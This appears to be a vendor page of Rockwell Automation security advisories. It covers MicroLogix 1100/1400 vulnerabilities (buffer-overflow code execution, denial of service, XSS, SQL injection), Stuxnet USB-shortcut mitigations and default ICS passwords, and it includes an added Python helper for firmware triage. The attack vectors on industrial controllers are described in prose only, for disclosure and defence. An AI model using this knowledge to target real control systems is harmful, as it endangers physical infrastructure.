CVE-2015-6492, CVE-2015-6491, CVE-2015-6490, CVE-2015-6486, CVE-2015-6488
Products:
MicroLogix 1100 and 1400 controller
CVSS Scores:
7.5, 3.7, 9.8, 4.6, 4.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

MicroLogix 1100 and 1400 Controller Vulnerabilities

Description

Version 2.0 - December 8th 2015 (Original Release: October 27th 2015)

From June through October 2015, Rockwell Automation was notified of security vulnerabilities discovered in the Allen-Bradley MicroLogix 1100 and/or MicroLogix 1400 product families. One of these notifications was the security vulnerability (KB731427) previously disclosed during DEFCON 23 in August 2015.

As part of this process, Rockwell Automation expanded the scope of its evaluation beyond the MicroLogix platform in order to determine if this same threat-vector has the potential to affect other Rockwell Automation product platforms. Rockwell Automation has reproduced all of these vulnerabilities in both the MicroLogix 1100 and MicroLogix 1400 product families. Due to the breadth of platforms potentially affected, Rockwell Automation has been conducting thorough evaluations to ensure completeness in its risk assessment and mitigation process.

Details relating to these vulnerabilities, the known affected platforms and recommended countermeasures are contained herein.

AFFECTED PRODUCTS

  • 1766-L32BWA, 1766-L32AWA, 1766-L32BXB, 1766-L32BWAA, 1766-L32AWAA, 1766-L32BXBA, Version 15.003 and earlier.
  • 1763-L16AWA, 1763-L16BWA, 1763-L16BBB, 1763-L16DWD, Version 14.000 and earlier.

VULNERABILITY DETAILS

Vulnerability #1: Remote Code Execution through Stack-based Buffer Overflow

A Remote Code Execution ("RCE") condition may result when an affected product receives a specific malicious web request. An attacker could exploit this vulnerability to inject and execute arbitrary code on the product. Receipt of such a message from an unintended or unauthorized source has the potential to cause loss of product availability and/or compromise the product’s integrity and confidentiality. The impact to the user’s automation system would be highly dependent on both the type of malicious code included in this attack and the mitigations that the user may already employ.

This vulnerability applies to both the MicroLogix 1100 and MicroLogix 1400 platforms. However, at this time a fix is only available for the MicroLogix 1100 product family. A future product update for the MicroLogix 1400 will be available in the November 2015 timeframe, and will include this vulnerability fix. Rockwell Automation will update this advisory at the time of the release.

03-DEC-2015 UPDATE: Version 15.004 is now available for the MicroLogix 1400 product. See below for more details.

CVE-2015-6490 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Vulnerability #2: Product Denial of Service

A Denial of Service ("DoS") condition may result on the MicroLogix 1100/1400 when an affected product receives a specific malicious web request, which would require user action to power cycle the product and restore it to a working state. Receipt of such a message from an unintended or unauthorized source has the potential to cause loss of product availability. The impact to the user’s automation system would be highly dependent on the mitigations that the user may already employ.

CVE-2015-6492 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability #3: Remote File Inclusion

A Remote File Inclusion condition may result on the MicroLogix 1100/1400 when an attacker crafts a malicious link, using the built-in feature to "redirect" outside web content into the product’s web page frame. This outside web content could contain malicious content that would target the unsuspecting user’s web browser when the content is rendered. The impact to the user’s automation system would be highly dependent on both the type of web exploits included in this attack and the mitigations that the user may already employ.

A successful attack would not compromise the integrity of the device or allow access to confidential information contained on it. On rare occasions the availability of the device may be affected if used in a large-scale phishing campaign. Vulnerable devices would effectively be a trusted host, used to unknowingly deliver potentially malicious content because of this vulnerability.

This vulnerability was first disclosed in publication KB731427 and ICS-ALERT-15-225-02A in August 2015.

CVE-2015-6491 has been assigned to this vulnerability. A CVSS v3 base score of 4.6 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)

Vulnerability #4: Stored Cross-site Scripting ("XSS")

Ilya Karpov of Positive Technologies identified an XSS vulnerability in both the MicroLogix 1100 and 1400. This vulnerability may allow an attacker to inject and store JavaScript in the product’s web server, which would be executed in the user’s web browser when accessing the embedded web server function. The stored JavaScript may be used to unknowingly execute web requests in the context of the user who is viewing the page. A factory reset is required to remove the stored JavaScript.

CVE-2015-6488 has been assigned to this vulnerability. A CVSS v3 base score of 4.7 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N)

Vulnerability #5: Privilege Escalation through Structured Query Language ("SQL") Injection

Ilya Karpov of Positive Technologies has identified a Privilege Escalation vulnerability in the MicroLogix 1100/1400. Privilege Escalation may result when an attacker tricks an authorized user (through social engineering/phishing) to click on a specific and malicious link, which allows the attacker to create or escalate the privileges of an existing user to the administrative level. An authorized administrator is required to undo the changes made after the attack.

CVE-2015-6486 has been assigned to this vulnerability. A CVSS v3 base score of 3.7 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:L)

For additional information on CVSS v3 metrics, vectors, and scores, please see FIRST’s Common Vulnerability Scoring System Version 3.0.

RISK MITIGATIONS
Rockwell Automation recommends that asset owners evaluate the impact with each of these vulnerabilities within their environment, and apply the following suggested mitigations which are applicable.

  1. Update supported products based on this table:

    Product Family | Catalog Numbers | Hardware Series | Vulnerabilities Fixed | Suggested Actions
    MicroLogix 1100 | 1763-L16AWA, 1763-L16BBB, 1763-L16BWA, 1763-L16DWD | Series B | 1, 2, 3, 4, and 5 | Apply FRN 15.000 (Downloads); apply the additional mitigations described below
    MicroLogix 1100 | 1763-L16AWA, 1763-L16BBB, 1763-L16BWA, 1763-L16DWD | Series A | None | Apply the mitigations described below
    MicroLogix 1400 | 1766-L32AWA, 1766-L32AWAA, 1766-L32BWA, 1766-L32BWAA, 1766-L32BXB, 1766-L32BXBA | Series B | 1, 2, 3, 4, and 5 | Apply FRN 15.004 (Downloads); apply the additional mitigations described below
    MicroLogix 1400 | 1766-L32AWA, 1766-L32AWAA, 1766-L32BWA, 1766-L32BWAA, 1766-L32BXB, 1766-L32BXBA | Series A | None | Apply the mitigations described below

  2. Disable the web server on the MicroLogix 1100 and 1400, as it is enabled by default. See KB732398 for detailed instructions on disabling the web server for each controller platform.
  3. Set the keyswitch to RUN to prohibit re-enabling of the web server via RSLogix 500.
  4. Use trusted software, software patches, anti-virus / anti-malware programs and interact only with trusted web sites and attachments.
  5. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  6. Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  7. Locate control system networks and devices behind firewalls, and isolate them from the business network.
  8. When remote access is required, use secure methods, such as Virtual Private Networks ("VPNs"), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  9. Subscribe to our Security Advisory Index, Knowledgebase article KB:54102 (https://www.rockwellautomation.com/en-us/company/about-us/sustainability/trust-security/security-advisories.html), so you have access to our most up-to-date information about security matters that affect Rockwell Automation products.

LINKS

  • Security Advisory Index, Knowledgebase article KB54102
  • KB732398 Disable Web Server on MicroLogix
  • ICS-CERT Advisory ICSA-15-300-03A Rockwell Automation Micrologix 1100 and 1400 PLC Systems Vulnerabilities (Update A)

KCS Status

Released

PN900 | Rockwell Automation recommended mitigations for Zero day vulnerability (W32.Stuxnet) to Microsoft® Windows™
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
CVE IDs:
CVE-2010-2568
Products:
RSLinx Classic (Single Node
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

Rockwell Automation recommended mitigations for Zero day vulnerability (W32.Stuxnet) to Microsoft® Windows™

Description

Released: 21 July 2010 Updated: 10 August 2010

Multiple credible sources disclosed that in the days and months prior to 14 July 2010 a series of cyber events occurred that took advantage of a previously unknown Windows™ vulnerability and delivered a specially crafted payload of malware that targeted industrial control systems, specifically SCADA/critical infrastructure processes. Technical details and a patch for the Windows vulnerability used during these events have been released by Microsoft in the recently updated Microsoft Security Advisory (2286198) v2.0 dated 2 August 2010. The specific malware, commonly known as W32.Stuxnet, has been analyzed by numerous antivirus vendors and is a known threat to Windows®-based systems.

Rockwell Automation recommends that all industrial control system users, regardless of the make or brand of components employed within the system, take necessary steps to safeguard against potential future attacks of this type by implementing good cyber security measures as outlined below.

Background

A Windows™ operating system vulnerability known as the Shortcut Icon Loading Vulnerability (CVE-2010-2568) was confirmed as a means to allow malware commonly known as W32.Stuxnet to load and execute on PCs. The malware has also been confirmed to specifically target Siemens WinCC and PCS-7 SCADA software products. These products are typically used to control critical infrastructure processes that include power generation, power distribution, water/wastewater and other similar applications.

Rockwell Automation continues to closely monitor every aspect of this situation for new information and developments in order to provide our customers with timely and appropriate advice on this matter. Furthermore, we are continuing to work closely with appropriate authorities to review our proactive plans.

Given that industrial applications are known to heavily rely on mission-critical products built on the Windows operating system, Rockwell Automation is issuing guidance for all industrial control system customers. The following measures are intended as additions to a company’s own security policies and can help to reduce associated risk and enhance control system security.

Vulnerability Description

The Shortcut Icon Loading Vulnerability currently uses USB drives as a means of transport to infect a PC, and does not rely on user interaction or the optional AutoPlay feature employed by the Windows operating system for devices that connect to USB ports.

The Microsoft Security Bulletin MS10-046 v1.1, dated 2 August 2010, details the threat and risk as follows:

What causes the vulnerability?

When attempting to load the icon of a shortcut, the Windows Shell does not correctly validate specific parameters of the shortcut.

What might an attacker use the vulnerability to do?

An attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. If a user is logged on with administrative user rights, an attacker could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

How could an attacker exploit the vulnerability?

An attacker could present a removable drive to the user with a malicious shortcut file, and an associated malicious binary. When the user opens this drive in Windows Explorer, or any other application that parses the icon of the shortcut, the malicious binary will execute code of the attacker’s choice on the target system.

An attacker could also set up a malicious Web site or a remote network share and place the malicious components on this remote location. When the user browses the Web site using a Web browser such as Internet Explorer or a file manager such as Windows Explorer, Windows attempts to load the icon of the shortcut file, invoking the malicious binary. In addition, an attacker could embed an exploit in a document that supports embedded shortcuts or a hosted browser control (such as but not limited to Microsoft Office documents).

IMMEDIATE RECOMMENDATIONS

Rockwell Automation has compiled the following immediate recommendations that include advice from Microsoft, Department of Homeland Security (DHS)/ICS-CERT plus added specific Rockwell Automation recommendations that can help mitigate the threat and simultaneously enhance the security of control systems:

MICROSOFT recommends immediate application of a Windows software patch as referenced in Microsoft Security Advisory (2286198) and further detailed in Microsoft Security Bulletin MS10-046 v1.1, dated 2 August 2010.

NOTE: Rockwell Automation’s Patch Qualification team has completed an initial and partial qualification of the Microsoft Patch 2286198. See Rockwell Automation’s Immediate Recommendations below for additional information.

DHS/ICS-CERT recommends concerned users immediately implement the following measures:

Mitigations

  • Establish strict policies for the use of USB thumb drives on all enterprise and control system networks.
  • Caution users of this attack vector and remind them that unknown USB drives should never be plugged into a business or personal computer.

Specific to this Shortcut Icon Loading Vulnerability and the specific W32.Stuxnet virus, malware samples were provided to the antivirus vendor community. Most major antivirus suppliers have already released updated virus definitions to contain and remove the malware.

  • ICS-CERT recommends consulting antivirus vendors and to consider scanning systems with current antivirus software.

NOTE: Rockwell Automation software is proactively tested for compatibility with Symantec’s Norton Antivirus software.

DHS/ICS-CERT reminds users to exercise caution when using USB drives. For more information on best practices and removable media, see the ICS-CERT Control Systems Analysis Report "USB Drives Commonly Used As An Attack Vector Against Critical Infrastructure."

www.us-cert.gov/control_systems/pdf/ICS-CERT%20CSAR-USB%20USAGE.pdf

Additional DHS/US-CERT Security Tips for use of caution with USB drives can be found here:

www.us-cert.gov/cas/tips/ST08-001.html

ROCKWELL AUTOMATION recommends concerned customers take the following additional precautions to enhance protection to industrial control systems:

Mitigations

  1. Apply the Microsoft Windows software patch as referenced in Microsoft Security Advisory (2286198) and further detailed in Microsoft Security Bulletin MS10-046.

    NOTE: The Rockwell Automation Patch Qualification Team Partially Qualified KB2286198 on 9 August 2010, with Full Qualification on 19 August 2010.

    Go to RAid:35530 for more specific information regarding the qualification of this patch.
  2. Restrict control system access to only those authorized to work with these systems.
  3. Make sure that all control system PCs are running end-point protection software (e.g. Antivirus, Anti-malware) and that all signatures are up to date.
  4. Make sure that all control system PCs follow a regimented, timely patch management process. Before applying any patch, Rockwell Automation recommends customers confirm that the patch has been qualified by the Rockwell Automation Patch Qualification service (www.rockwellautomation.com/security).
  5. Where practical, disable all unused USB ports on control system PCs.
  6. Consider alternatives to USB drives (e.g. network file transfer) for transferring data files to the control system.
  7. Discontinue use of any USB drive or similar device if the validity, authenticity, and security of the hardware should come in question.
  8. Purchase USB drives from trusted sources.
  9. Only use USB drives manufactured by a trusted vendor.
  10. Format USB drives on a non-mission critical computer that is running up to date end-point protection software (e.g. Antivirus, Anti-malware) prior to connecting the USB drive to any critical industrial control system equipment.
  11. Maintain physical security for USB drives, dongles and keys to ensure only authorized users have access and usage rights.
  12. Should a failure in physical security policy regarding USB drives be identified, perform step 9 (format the USB drive on a non-mission critical computer) prior to subsequently connecting it to any control system equipment. Seek instructions from the supplier of USB dongles and keys prior to any further use on control system equipment.

NOTE: Similar caution should be employed with optical media as with USB drives. Software delivered on non-production optical media (CD+/-R, DVD+/-R, etc.; e.g. user-generated, "burned" rather than "pressed" media) is presumed higher risk than production-grade media.

As more information becomes known, Rockwell Automation expects these recommendations will be refined to help further protect control systems from the resulting risk.

For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security through the use of layered security and defense-in-depth practices when using Rockwell Automation and other vendors' control products, you can visit the Rockwell Automation Security Solutions web site at www.rockwellautomation.com/security.

KCS Status

Released

PN907 | PN907 | SCADAPass Default Passwords
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
2711P PanelView Plus 6 Logic Modules, POINT I/O Communication Interfaces, 2711P PanelView Plus 6 400-1500
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

SCADAPass Default Passwords

Description

Version 1.0 – January 11th 2016

In January 2016, SCADA Strange Love, an independent group of information security researchers, included several Rockwell Automation products in a project they published called SCADAPass.

SCADAPass contains a list of default passwords in popular industrial control systems ("ICS") and supervisory control and data acquisition ("SCADA") products, including programmable logic controllers ("PLCs") and human-machine interfaces ("HMIs"). Default credentials may be used by an attacker to gain privileged access to remotely accessible assets if a user does not take explicit action to change the default user credentials.

As part of this process, Rockwell Automation evaluated the products included in SCADAPass and determined that all of the products’ default passwords are changeable by the user. Directions on how to change these passwords are given in the respective product manuals, listed in the table below.

INCLUDED PRODUCTS

  • 1756-EN2TSC
  • 1756-EWEB
  • 1734-AENT
  • MicroLogix 1400
  • MicroLogix 1100
  • PanelView Plus 6

RISK MITIGATIONS

  1. Rockwell Automation strongly recommends that asset owners evaluate the passwords used in their production assets, and apply the following suggested mitigations which are applicable:

    Product            Product Manual
    1756-EN2TSC        http://literature.rockwellautomation.com/idc/groups/literature/documents/um/enet-um003_-en-p.pdf
    1756-EWEB          http://literature.rockwellautomation.com/idc/groups/literature/documents/um/enet-um527_-en-p.pdf
    1734-AENT          http://literature.rockwellautomation.com/idc/groups/literature/documents/um/1734-um011_-en-p.pdf
    MicroLogix 1100    http://literature.rockwellautomation.com/idc/groups/literature/documents/um/1763-um002_-en-p.pdf
    MicroLogix 1400    http://literature.rockwellautomation.com/idc/groups/literature/documents/um/1766-um002_-en-p.pdf
    PanelView Plus 6   http://www.manualsdir.com/manuals/580848/rockwell-automation-2711p-xxxx-panelview-plus-6-terminals-user-manual.html?page=54
  2. Establish and enforce password policies for maximum age of passwords, minimum password length, minimum password complexity, and password re-use.
  3. Use trusted software, software patches, anti-virus / anti-malware programs and interact only with trusted web sites and attachments.
  4. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  5. Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  6. Locate control system networks and devices behind firewalls, and isolate them from the business network.
  7. When remote access is required, use secure methods, such as Virtual Private Networks ("VPNs"), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  8. Subscribe to our Security Advisory Index, Knowledgebase article KB:54102 (https://www.rockwellautomation.com/en-us/company/about-us/sustainability/trust-security/security-advisories.html), so you have access to our most up-to-date information about security matters that affect Rockwell Automation products.

LINKS

  • Security Advisory Index, Knowledgebase article KB:54102

KCS Status

Released

Critical
PN910 | PN910 | MicroLogix 1100 Web Server Buffer Overflow
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
CVE IDs:
CVE-2016-0868
Products:
MicroLogix 1100 Web Server Buffer Overflow
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

MicroLogix 1100 Web Server Buffer Overflow

Description

Version 1.0 – January 26th 2016

In December 2015, Rockwell Automation was notified by ICS-CERT of a Buffer Overflow security vulnerability discovered in the web server of the Allen-Bradley MicroLogix 1100 controller platform. At this time, there is no known publicly available exploit code relating to the vulnerability. Rockwell Automation has verified this discovery and released revised product firmware to address associated risk. ICS-CERT published an advisory (ICSA-16-026-02) to cover this vulnerability.

Refer to the following for additional details relating to the vulnerability, affected product and recommended countermeasures.

AFFECTED PRODUCTS

  • 1763-L16AWA, 1763-L16BWA, 1763-L16BBB, 1763-L16DWD, Version 15.000 and earlier.

VULNERABILITY DETAILS

Remote Code Execution through Stack-based Buffer Overflow

A Remote Code Execution ("RCE") condition may result when an affected product receives a specific malicious web request. An attacker could exploit this vulnerability to inject and execute arbitrary code on the product. Receipt of such a request from an unintended or unauthorized source has the potential to cause loss of product availability and/or compromise the product’s integrity and confidentiality. The impact to the user’s automation system would be highly dependent on both the type of malicious code included in this attack and the mitigations that the user may already employ.

CVE-2016-0868 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

RISK MITIGATIONS

Rockwell Automation recommends that asset owners evaluate the impact of this vulnerability within their environment, and apply the following suggested mitigations which are applicable.

  1. Update supported products based on this table:
    Product Family     Catalog Numbers                                       Hardware Series   Suggested Actions
    MicroLogix 1100    1763-L16AWA, 1763-L16BBB, 1763-L16BWA, 1763-L16DWD    Series B          - Apply FRN 15.002 (Downloads)
                                                                                               - Apply the additional mitigations described below
    MicroLogix 1100    1763-L16AWA, 1763-L16BBB, 1763-L16BWA, 1763-L16DWD    Series A          - Apply the additional mitigations described below
  2. Disable the web server on the MicroLogix 1100, as it is enabled by default. See KB 732398 for detailed instructions on disabling the web server for each controller platform.
  3. Set the keyswitch to RUN to prohibit re-enabling of the web server via RSLogix 500.
  4. Use trusted software, software patches, anti-virus / anti-malware programs and interact only with trusted web sites and attachments.
  5. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  6. Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  7. Locate control system networks and devices behind firewalls, and isolate them from the business network.
  8. When remote access is required, use secure methods, such as Virtual Private Networks ("VPNs"), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  9. Subscribe to our Security Advisory Index, Knowledgebase article KB:54102 (https://www.rockwellautomation.com/en-us/company/about-us/sustainability/trust-security/security-advisories.html), so you have access to our most up-to-date information about security matters that affect Rockwell Automation products.
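The remediation table and the web-server mitigations above can be applied mechanically to an asset inventory. The following triage helper is an added example, not Rockwell Automation code: it encodes the advisory's boundaries (Version 15.000 and earlier affected, FRN 15.002 fixes Series B, no firmware fix for Series A) and compares firmware revisions numerically rather than as strings, which matters once an inventory mixes single- and double-digit major revisions. The Device records and the "FRN x.yyy" parsing are assumptions about how an inventory reports firmware.

```python
"""Triage helper for CVE-2016-0868 (MicroLogix 1100 web server buffer overflow).

Added example, not Rockwell Automation code. Affected/fixed boundaries come from
the advisory; the device records at the bottom are constructed sample data.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

AFFECTED_CATALOGS = {"1763-L16AWA", "1763-L16BWA", "1763-L16BBB", "1763-L16DWD"}
LAST_AFFECTED = (15, 0)   # "Version 15.000 and earlier" per the advisory
FIXED_FRN = (15, 2)       # FRN 15.002 per the advisory (Series B only)


def parse_frn(text: str) -> Tuple[int, int]:
    """Turn 'FRN 15.002', '15.000' or 'v9.001' into a comparable (major, minor) tuple.

    Numeric comparison is deliberate: as plain strings, '9.001' sorts after '15.000'.
    """
    m = re.search(r"(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised firmware string: {text!r}")
    return int(m.group(1)), int(m.group(2))


@dataclass
class Device:
    name: str
    catalog: str       # catalog number as reported by the inventory (assumed field)
    series: str        # hardware series letter, e.g. "A" or "B" (assumed field)
    firmware: str      # firmware revision string (assumed field)
    web_server: bool   # built-in web server enabled; the advisory says it is by default


def triage(dev: Device) -> str:
    """Return the advisory action for one device."""
    if dev.catalog not in AFFECTED_CATALOGS:
        return "not in scope"
    if parse_frn(dev.firmware) > LAST_AFFECTED:
        return "not affected (firmware newer than 15.000)"
    if dev.series.upper() == "B":
        action = "apply FRN 15.002"
    else:
        action = "no firmware fix for Series A; rely on mitigations"
    if dev.web_server:
        # Mitigations 2 and 3 above: disable the web server, lock it with the keyswitch.
        action += "; disable web server (KB 732398) and set keyswitch to RUN"
    return action


def triage_inventory(devices: List[Device]) -> List[Tuple[str, str]]:
    """Map every inventory entry to (name, action) for a remediation worklist."""
    return [(d.name, triage(d)) for d in devices]
```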

LINKS

  • Security Advisory Index, Knowledgebase article KB:54102
  • KB732398 Disable Web Server on MicroLogix

KCS Status

Released

Medium
PN915 | PN915 | Integrated Architecture Builder (IAB) Access Violation
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
CVE IDs:
CVE-2016-2277
Products:
Integrated Architecture Builder (IAB)
CVSS Scores:
6.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No